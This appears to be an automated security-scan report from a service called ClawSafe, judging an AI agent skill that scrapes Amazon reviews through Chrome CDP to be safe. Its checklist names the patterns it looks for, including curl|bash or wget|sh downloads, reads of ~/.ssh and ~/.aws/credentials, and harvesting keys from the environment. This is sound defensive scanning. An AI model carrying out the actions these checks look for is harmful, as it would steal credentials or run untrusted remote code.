amazon-review-workbook 安全扫描报告 — 可信 | ClawSafe

5 /100

amazon-review-workbook

Collect Amazon product reviews via Chrome CDP and export a 14-column delivery-ready workbook with optional DeepLX translation and model-assisted semantic tagging.

Legitimate Amazon review scraper using Chrome CDP; all operations are documented, scoped, and appropriate for the stated purpose.

技能名称amazon-review-workbook

分析耗时49.5s

引擎pi

✓

可以安装

No action needed. The skill is safe to use as documented.

安全发现 5 项

严重性	安全发现	位置
低危	No dependency version pinning requirements.txt/package.json not present; requests library pinned to * in code imports. No known CVEs for used versions. `import requests` → Add a requirements.txt with pinned versions if distributing as a package	`scripts/amazon_review_workbook.py:1`
提示	Chrome CDP browser automation Uses Chrome remote debugging protocol (port 9222) to scrape Amazon. All CDP eval expressions are reviewed; no data exfiltration beyond what is scraped from Amazon. `BrowserSession class` → None; this is the documented mechanism	`scripts/amazon_review_workbook.py:657`
提示	External network calls only to user-configured DeepLX Network requests go to a URL configured by the user via DEEPLX_API_URL environment variable. No hardcoded external IPs. `requests.post(api_url, ...)` → None; this is the documented translation feature	`scripts/deeplx_translate.py:95`
提示	No sensitive path access Script does not access ~/.ssh, ~/.aws, .env (other than its own optional .env for DeepLX config), or any credential stores outside its documented scope. `No os.environ iteration for secrets` → None	`scripts/amazon_review_workbook.py:1`
提示	No hidden functionality All code paths are traceable to documented SKILL.md capabilities. CDP expressions are visible inline. No obfuscation, eval(), or base64 payloads. `browser.eval(expression)` → None	`scripts/amazon_review_workbook.py:637`

资源类型	声明权限	推断权限	状态	证据
文件系统	`READ`	`READ`	✓ 一致	Reads JSON/CSV/XLSX output files and local .env
网络访问	`READ`	`READ`	✓ 一致	Makes HTTP POST to user-configured DeepLX endpoint only
命令执行	`WRITE`	`WRITE`	✓ 一致	Executes Python scripts via CLI; standard for script-based skills
环境变量	`NONE`	`READ`	✓ 一致	Reads DEEPLX_API_URL/KEY from environment; does not harvest credentials
技能调用	`NONE`	`NONE`	—	No skill invocation chains detected
剪贴板	`NONE`	`NONE`	—	No clipboard access
浏览器	`READ`	`READ`	✓ 一致	Chrome CDP on localhost:9222; strictly scoped to scraping
数据库	`WRITE`	`WRITE`	✓ 一致	SQLite cache for review data; contained in output directory

2 项发现

🔗

中危外部 URL 外部 URL

https://your-deeplx-host/translate

README.md:53

🔗

中危外部 URL 外部 URL

http://127.0.0.1:

scripts/amazon_review_workbook.py:675

目录结构

12 文件 · 175.0 KB · 5210 行

Python 5f · 4471L Markdown 6f · 735L YAML 1f · 4L

├─ ▾ 📁 agents

│ └─ 📋 openai.yaml YAML 4L · 352 B

├─ ▾ 📁 references

│ ├─ 📝 output-schema.md Markdown 81L · 2.4 KB

│ ├─ 📝 setup.md Markdown 104L · 3.1 KB

│ └─ 📝 tagging-guidelines.md Markdown 129L · 4.1 KB

├─ ▾ 📁 scripts

│ ├─ 🐍 amazon_review_workbook.py Python 2415L · 83.8 KB

│ ├─ 🐍 deeplx_translate.py Python 330L · 9.6 KB

│ ├─ 🐍 label_workflow.py Python 663L · 20.3 KB

│ ├─ 🐍 review_cache.py Python 465L · 15.7 KB

│ └─ 🐍 review_delivery_schema.py Python 598L · 18.6 KB

├─ 📝 LICENSE.zh-CN.md Markdown 23L · 1.1 KB

├─ 📝 README.md Markdown 240L · 6.4 KB

└─ 📝 SKILL.md Markdown 158L · 9.7 KB

依赖分析 5 项

包名	版本	来源	已知漏洞	备注
`requests`	`*`	pip	否	No known CVE for current version; should be pinned for production
`websocket-client`	`*`	pip	否	Used for Chrome CDP WebSocket
`pandas`	`*`	pip	否	Workbook generation
`openpyxl`	`*`	pip	否	XLSX output
`sqlite3`	`built-in`	stdlib	否	Local caching

安全亮点

✓ Comprehensive SKILL.md with explicit capability declarations

✓ Clean separation of concerns across 5 focused Python modules

✓ Chrome CDP access strictly scoped to localhost:9222

✓ No credential harvesting beyond optional DeepLX API key (used only for translation)

✓ No data exfiltration — all scraped data stays in local output directory

✓ SQLite cache contained within output directory, not system paths

✓ No subprocess or shell command injection vectors

✓ No base64/eval/atob obfuscation patterns

✓ No remote script download (curl|bash, wget|sh)

✓ No iteration through os.environ for sensitive keys

✓ No access to ~/.ssh, ~/.aws/credentials, or similar sensitive paths

✓ Well-structured code with type hints and error handling

✓ Explicit failure boundaries documented in SKILL.md